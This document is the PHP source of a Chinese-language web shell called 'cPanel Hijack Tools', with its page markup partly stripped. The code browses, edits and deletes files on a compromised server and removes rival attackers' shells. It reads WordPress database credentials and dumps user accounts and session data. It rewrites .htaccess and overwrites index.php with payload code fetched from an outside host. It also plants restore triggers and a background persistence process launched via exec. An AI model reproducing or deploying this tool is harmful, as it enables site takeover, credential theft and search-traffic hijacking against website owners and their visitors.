cPanel Hijack Tools

搜索范围

己方标记

自动删除

开关（注意：请确认己方备码、恢复码和劫持码都有加入标记！）

	文件名	权限	创建时间	编辑时间	访问时间	大小	类型
全选

'; }else{ $auto = isset($_POST['auto']) ? $_POST['auto'] : 0; getShell($path, $sign, $auto); if($shell == ''){ $content = '搜索不到符合要求的文件。'; }else{ $content = ''; } } break; case 'batchDel': $title = '删除选中文件'; $content = '

处理结果

'; if(isset($_POST['files'])){ foreach($_POST['files'] as $v){ if(file_exists($v)){ if(unlink($v)){ $content .= $v.' 删除成功
'; }else{ $content .= ''.$v.' 删除失败
'; } }else{ $content .= $v.' 已经被删除
'; } } $content .= '

'; } break; case 'del': $title = '删除文件'; $path = str_replace($dian, '.', $path); $content = '

文件名	操作
'.$path.'	'; if($path){ if(file_exists($path)){ if(unlink($path)){ $content .= '成功'; }else{ $content .= '失败 '; } }else{ $content .= '成功'; } } $content .= '

	文件名	权限	创建时间	编辑时间	访问时间	大小
全选

	文件名	权限	创建时间	编辑时间	访问时间	大小	类型
全选

'; break; case 'delAll': $title = '全站删除特定文件'; $sign = isset($_REQUEST['sign']) ? $_REQUEST['sign'] : ''; if($sign == ''){ $content = ''; }else{ $md5 = isset($_POST['md5']) ? $_POST['md5'] : ''; if($md5 == '' && $sign){ $sign = str_replace($dian, '.', $sign); if(file_exists($sign)){ $md5 = md5(file_get_contents($sign)); } } $auto = isset($_POST['auto']) ? $_POST['auto'] : 0; if($md5){ getDelAll($path, $md5, $auto); } if($shell == ''){ $content = '搜索不到符合要求的文件。'; }else{ $content = ''; } } break; case 'edit': $title = '查看/编辑代码'; $code = isset($_POST['code']) ? $_POST['code'] : ''; if($code){ $path = str_replace($dian, '.', $path); if(file_exists($path)){ file_put_contents($path, $code); $content = '编辑成功'; } }else{ $realPath = str_replace($dian, '.', $path); $content = ''; } break; case 'kill': $title = '查杀同行大码'; $sign = isset($_POST['sign']) ? $_POST['sign'] : ''; if($sign == ''){ $content = ''; }else{ $auto = isset($_POST['auto']) ? $_POST['auto'] : 0; getShell($path, $sign, $auto); if($shell == ''){ $content = '搜索不到符合要求的文件。'; }else{ $content = ''; } } break; case 'list': $dir = __DIR__; if($path){$dir = $path;} if($dir == '.'){$dir = $root;} $title = $dir; $content = '

'; $count = 0; foreach(hardScandir($dir) as $value){ $fullPath = str_replace('//', '/', $dir.'/'.$value); if($value != '.' && $value != '..' && is_dir($fullPath)){ $content .= ''; $count++; if($count == 100){ break; } } } foreach(hardScandir($dir) as $value){ $fullPath = str_replace('//', '/', $dir.'/'.$value); if($value != '.' && $value != '..' && !is_dir($fullPath)){ $content .= ''; $count++; if($count == 100){ break; } } } $content .= '

	文件名	权限	创建时间	编辑时间	访问时间	大小	操作
	'.$fullPath.'	'.substr(sprintf('%o', fileperms($fullPath)), -4).'	'.date("Y-m-d H:i:s", filectime($fullPath)).'	'.date("Y-m-d H:i:s", filemtime($fullPath)).'	'.date("Y-m-d H:i:s", fileatime($fullPath)).'	文件夹
	'.$fullPath.'	'.substr(sprintf('%o', fileperms($fullPath)), -4).'	'.date("Y-m-d H:i:s", filectime($fullPath)).'	'.date("Y-m-d H:i:s", filemtime($fullPath)).'	'.date("Y-m-d H:i:s", fileatime($fullPath)).'	'.round(filesize($fullPath) / 1024, 2).' Kb	删除删除全部
全选

	文件名	权限	创建时间	编辑时间	访问时间	大小	类型
全选注意：大部分触发式还原码不能直接删除！

'; break; case 'trigger': $title = '查找触发式还原码'; $start = isset($_POST['start']) ? $_POST['start'] : 0; if($start == 0){ $content = ''; }else{ $sign = isset($_POST['sign']) ? $_POST['sign'] : ''; $auto = isset($_POST['auto']) ? $_POST['auto'] : 0; getTrigger($path, $sign, $auto); if($trigger == ''){ $content = '搜索不到符合要求的文件。'; }else{ $content = ''; } } break; case 'unlink': $title = '自毁程序'; $status = unlink(__FILE__); if($status){ $content = '自毁成功'; }else{ $content = '自毁失败'; } break; case 'wp-user': $title = '用户列表'; if(!file_exists($root.'wp-config.php') && $path == '.'){ $content = ''; }else{ if($path == '.'){ $path = $root; } $path = htmlspecialchars($path); require $path.'wp-config.php'; $con = mysqli_connect(DB_HOST, DB_USER, DB_PASSWORD, DB_NAME); if(mysqli_connect_errno($con)){ $content = 'Wordpress 数据库连接失败。'.mysqli_connect_error(); exit(); } mysqli_query($con, "SET NAMES ".DB_CHARSET); $sql = mysqli_query($con , "SELECT * FROM `".$table_prefix."users`"); $total = mysqli_num_rows($sql); if($total > 0){ $content = '
'; $content .= ''; while($row = mysqli_fetch_array($sql, MYSQLI_ASSOC)){ $last_time = '-'; $sql2 = mysqli_query($con , "SELECT `meta_value` FROM `".$table_prefix."usermeta` WHERE `meta_key` = 'session_tokens' AND `user_id` = ".$row['ID']); if(mysqli_num_rows($sql2) > 0){ $row2 = mysqli_fetch_array($sql2, MYSQLI_ASSOC); $temp = explode('login', $row2['meta_value']); $temp = str_replace(array(':', 'i', '}', ';', '"', '"'), '', $temp[count($temp)-1]); $last_time = date("Y-m-d H:m:s", trim($temp)); } $content .= ''; } $content .= '

ID	用户名	邮箱	昵称	最近一次登陆	注册时间
'.$row['ID'].'	'.$row['user_login'].'	'.$row['user_email'].'	'.$row['user_nicename'].'	'.$last_time.'	'.$row['user_registered'].'

'; } mysqli_close($con); } break; case 'hijack': $title = 'cPanel 劫持'; $content = ''; $htaccess = isset($_POST['htaccess']) ? $_POST['htaccess'] : ''; $index = isset($_POST['index']) ? base64_decode($_POST['index'], 1) : ''; $code1 = ''; $sign = isset($_POST['sign']) ? $_POST['sign'] : ''; $hijack = isset($_POST['hijack']) ? $_POST['hijack'] : ''; $hijack = str_replace($dian, '.', $hijack); $hijack2 = isset($_POST['hijack2']) ? $_POST['hijack2'] : ''; $hijack2 = str_replace($dian, '.', $hijack2); $fileName2 = isset($_POST['fileName2']) ? $_POST['fileName2'] : ''; $fileName2 = str_replace($dian, '.', $fileName2); $code2 = ''; $hijack3 = isset($_POST['hijack3']) ? $_POST['hijack3'] : ''; $hijack3 = str_replace($dian, '.', $hijack3); $fileName3 = isset($_POST['fileName3']) ? $_POST['fileName3'] : ''; $fileName3 = str_replace($dian, '.', $fileName3); $code3 = ''; if($htaccess == ''){ $htaccess = "".PHP_EOL."RewriteEngine On".PHP_EOL."RewriteBase /".PHP_EOL."RewriteRule ^index.php$ - [L]".PHP_EOL."RewriteCond %{REQUEST_FILENAME} !-f".PHP_EOL."RewriteCond %{REQUEST_FILENAME} !-d".PHP_EOL."RewriteRule . index.php [L]".PHP_EOL.""; } if(file_exists($root.".htaccess")){ $temp = file_get_contents($root.".htaccess"); if(md5($temp) != md5($htaccess)){ @chmod($root.".htaccess", 0755); @unlink($root.".htaccess"); $result = file_put_contents($root.".htaccess", $htaccess); if($result){ $temp = file_get_contents($root.".htaccess"); if(md5($temp) == md5($htaccess)){ $content .= ".htaccess 编辑成功。
"; }else{ $content .= ".htaccess 编辑失败。
"; } }else{ $content .= ".htaccess 编辑失败。
"; } }else{ $content .= ".htaccess 正常。
"; } }else{ $result = file_put_contents($root.".htaccess", $htaccess); if($result){ $temp = file_get_contents($root.".htaccess"); if(md5($temp) == md5($htaccess)){ $content .= ".htaccess 生成成功。
"; }else{ $content .= ".htaccess 生成失败。
"; } }else{ $content .= ".htaccess 生成失败。
"; } } $code_link = 'http://tools.ptfish.top/5.5/stat/ja/index99.txt'; $temp = get_loaded_extensions(); foreach($temp as $v){ if($v == 'i360'){ $code_link = str_replace('index86.txt', 'index99.txt', $code_link); break; } } if($hijack){ if($code_link == ''){ $code1 = ""; }else{ $arr_url = parse_url($hijack); $version = str_replace('/stat/index.txt', '', $arr_url['path']); $version = ltrim($version, '/'); if(getHijackNum($hijack) == 9){ $code_link = str_replace('/ja/', '/en/', $code_link); } $code1 = get($code_link); $code1 = str_replace('z1007_7', $version, $code1); $code1 = str_replace('192.187.108.42', $arr_url['host'], $code1); } $result = file_put_contents($root."index.php", $code1.$index); if($result){ $content .= $hijack." - index.php 劫持成功。
"; }else{ $content .= $hijack." - index.php 劫持失败。
"; } } if($hijack2 && $fileName2){ if($code_link == ''){ $code2 = ""; }else{ $arr_url = parse_url($hijack2); $version = str_replace('/stat/index.txt', '', $arr_url['path']); $version = ltrim($version, '/'); if(getHijackNum($hijack2) == 9){ $code_link = str_replace('/ja/', '/en/', $code_link); }else{ $code_link = str_replace('/en/', '/ja/', $code_link); } $code2 = get($code_link); $code2 = str_replace('z1007_7', $version, $code2); $code2 = str_replace('192.187.108.42', $arr_url['host'], $code2); } $result = file_put_contents($root.$fileName2, $code2); if($result){ $content .= $hijack2." - ".$fileName2." 劫持成功。
"; }else{ $content .= $hijack2." - ".$fileName2." 劫持失败。
"; } } if($hijack3 && $fileName3){ if($code_link == ''){ $code3 = ""; }else{ $arr_url = parse_url($hijack3); $version = str_replace('/stat/index.txt', '', $arr_url['path']); $version = ltrim($version, '/'); if(getHijackNum($hijack3) == 9){ $code_link = str_replace('/ja/', '/en/', $code_link); }else{ $code_link = str_replace('/en/', '/ja/', $code_link); } $code3 = get($code_link); $code3 = str_replace('z1007_7', $version, $code3); $code3 = str_replace('192.187.108.42', $arr_url['host'], $code3); } $result = file_put_contents($root.$fileName3, $code3); if($result){ $content .= $hijack3." - ".$fileName3." 劫持成功。
"; }else{ $content .= $hijack3." - ".$fileName3." 劫持失败。
"; } } $defend = isset($_POST['defend']) ? $_POST['defend'] : 0; switch($defend){ case 1: $code = '"; } } break; case 2: $path_file = isset($_POST['path_file']) ? $_POST['path_file'] : ''; $path_code = isset($_POST['path_code']) ? $_POST['path_code'] : ''; if(is_wp($root) && $path_file && $path_code){ $code = ''; $temp = str_replace("//", "/", $root.$path_file); $result = file_put_contents($temp, $code); if($result){ $content .= "WordPress 触发文件 ".$temp." 生成完毕
"; }else{ $content .= "WordPress 触发文件 ".$temp." 生成失败
"; } $code = ""; $file = explode(',', $path_code); for($i=0;$i"; }else{ $content .= "WordPress 触发代码嵌入 ".$temp." 失败
"; } }else{ $content .= "WordPress 触发代码嵌入 ".$temp." 已经存在
"; } } } $content .= "WordPress 触发式守护结束
"; } break; case 3: $code = ' /dev/null 2>/dev/null &", $e18);@unlink("$q16");?>'; $check = file_put_contents($root.'lock3.php', $code); if($check == false){ $fp = fopen($root.'lock3.txt',"wb"); fwrite($fp, $code); fclose($fp); rename($root.'lock3.txt', $root.'lock3.php'); } exec("php -f".$root."/lock3.php > /dev/null 2>/dev/null &", $return); $content .= "进程式守护结束
"; break; } break; default: $title = 'cPanel 劫持'; $content = ''; break; }?> cPanel Hijack Tools